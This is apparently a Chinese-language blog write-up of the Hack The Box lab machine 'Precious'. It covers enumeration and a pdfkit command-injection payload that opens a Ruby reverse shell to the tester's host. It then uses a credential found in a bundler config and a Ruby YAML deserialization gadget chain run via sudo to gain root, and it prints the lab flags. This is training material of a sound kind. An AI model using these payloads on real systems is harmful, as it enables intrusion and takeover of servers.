HTB-Precious

Precious

NMAP Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEAPxqUubE88njHItE+mjeWJXOLu5reIBmQHCYh2ETYO5zatgel+LjcYdgaa4KLFyw8CfDbRL9swlmGTaf4iUbao4jD73HV9/Vrnby7zP04OH3U/wVbAKbPJrjnva/czuuV6uNz4SVA3qk0bp6wOrxQFzCn5OvY3FTcceH1jrjrJmUKpGZJBZZO6cp0HkZWs/eQi8F7anVoMDKiiuP0VX28q/yR1AFB4vR5ej8iV/X73z3GOs3ZckQMhOiBmu1FF77c7VW1zqln480/AbvHJDULtRdZ5xrYH1nFynnPi6+VU/PIfVMpHbYu7t0mEFeI5HxMPNUvtYRRDC14jEtH6RpZxd7PhwYiBctiybZbonM5UP0lP85OuMMPcSMll65+8hzMMY2aejjHTYqgzd7M6HxcEMrJW7n7s5eCJqMoUXkL8RSBEQSmMUV8iWzHW0XkVUfYT5Ko6Xsnb+DiiLvFNUlFwO6hWz2WG8rlZ3voQ/gv8BLVCU1ziaVGerd61PODck=
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFScv6lLa14Uczimjt1W7qyH6OvXIyJGrznL1JXzgVFdABwi/oWWxUzEvwP5OMki1SW9QKX7kKVznWgFNOp815Y=
|   256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH+JGiTFGOgn/iJUoLhZeybUvKeADIlm0fHnP/oZ66Qb
80/tcp open  http    syn-ack nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Recon

80/tcp

1
2
3
4
給他一個url,他會將html page轉成pdf
利用exiftool去查看pdf內容

exiftool 48wxd3knvdh5s59j19ql6fe7k4dobph2.pdf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ExifTool Version Number         : 12.44
File Name                       : 48wxd3knvdh5s59j19ql6fe7k4dobph2.pdf
Directory                       : .
File Size                       : 48 kB
File Modification Date/Time     : 2022:12:25 20:32:03-05:00
File Access Date/Time           : 2022:12:25 20:32:10-05:00
File Inode Change Date/Time     : 2022:12:25 20:32:08-05:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 2
Creator                         : Generated by pdfkit v0.8.6

EntryPoint

  • pdfkit
    1
    2
    3
    pdfkit 0.8.7以下 存在Command Injection漏洞

    https://github.com/CyberArchitect1/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell

Get Shell

1
2
3
4
構造Command Injection

payload:
http%3a%2f%2f10.10.14.8%3a1234%2f%3fname%3d%2520%60%20ruby%20-rsocket%20-e'spawn(%22sh%22%2c%5b%3ain%2c%3aout%2c%3aerr%5d%3d%3eTCPSocket.new(%2210.10.14.8%22%2c6666))'%60

  • Reverse Shell

提權

  • /etc/passwd

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
    sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
    henry:x:1000:1000:henry,,,:/home/henry:/bin/bash
    systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
    systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
    ruby:x:1001:1001::/home/ruby:/bin/bash
    _laurel:x:997:997::/var/log/laurel:/bin/false

  • 找到hanry使用者密碼

    1
    2
    3
    grep -nir "henry" 2>/dev/null

    .bundle/config:2:BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

  • 切換到hanry使用者 sudo -l

    1
    2
    3
    4
    5
    6
    Matching Defaults entries for henry on precious:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

    User henry may run the following commands on precious:
        (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

Ruby Deserialization

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: sudo bash
         method_id: :resolve
1
sudo ruby /opt/update_dependencies.rb

FLAG

  • user
    1
    635dfa84ea29ad043681acf88c4ef533
  • root
    1
    310a4bb75b4b420af95f236fce20f918
HTB > 靶機
#pdfkit #ruby #Ruby Deserialization
HTB-Precious
https://0xbe61a55f.github.io/2022/12/26/HTB-Precious/
作者
Giwawa
發布於
2022年12月26日
許可協議